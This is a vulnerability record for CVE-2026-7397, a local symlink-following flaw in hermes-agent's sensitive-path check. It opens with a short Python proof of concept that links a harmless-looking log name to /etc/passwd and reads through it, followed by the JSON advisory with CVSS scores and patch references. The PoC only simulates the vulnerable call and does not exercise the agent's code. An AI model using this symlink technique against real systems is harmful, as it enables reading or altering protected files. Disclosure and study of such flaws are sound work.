CVE-2026-7397

import os # PoC for CVE-2026-7397: Symlink Following in hermes-agent # The vulnerability allows a local low-privileged user to bypass # the _check_sensitive_path check via a symlink. def exploit(): # Assume the agent is configured to write logs or data to a 'safe' directory safe_dir = "/tmp/hermes_safe_output" os.makedirs(safe_dir, exist_ok=True) # Target a sensitive system file (e.g., a critical config or script) sensitive_target = "/etc/passwd" # Create a malicious symlink inside the 'safe' directory # The name looks innocent, but points outside the restricted scope malicious_link_path = os.path.join(safe_dir, "output_log.txt") try: os.symlink(sensitive_target, malicious_link_path) print(f"[+] Symlink created: {malicious_link_path} -> {sensitive_target}") # Simulate the vulnerable function call # The application checks the path 'output_log.txt' against allowed paths. # Due to the flaw, it follows the link to /etc/passwd. print(f"[*] Triggering vulnerable file operation...") with open(malicious_link_path, 'r') as f: # This demonstrates read access; write access (I:L) is also possible content = f.read() print("[!] Successfully read sensitive file content via symlink.") except Exception as e: print(f"[-] Exploit failed: {e}") finally: # Cleanup if os.path.islink(malicious_link_path): os.remove(malicious_link_path) if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-7397", "sourceIdentifier": "[email protected]", "published": "2026-04-29T19:16:26.150", "lastModified": "2026-04-29T21:16:21.590", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in NousResearch hermes-agent 0.8.0. This affects the function _check_sensitive_path of the file tools/file_tools.py. The manipulation results in symlink following. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.9.0 is able to mitigate this issue. The patch is identified as 311dac197145e19e07df68feba2cd55d896a3cd1. Upgrading the affected component is recommended."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 3.2, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-61"}]}], "references": [{"url": "https://github.com/NousResearch/hermes-agent/", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/commit/311dac197145e19e07df68feba2cd55d896a3cd1", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/issues/8734", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/pull/8829", "source": "[email protected]"}, {"url": "https://github.com/NousResearch/hermes-agent/releases/tag/v2026.4.13", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/803270", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360121", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360121/cti", "source": "[email protected]"}]}}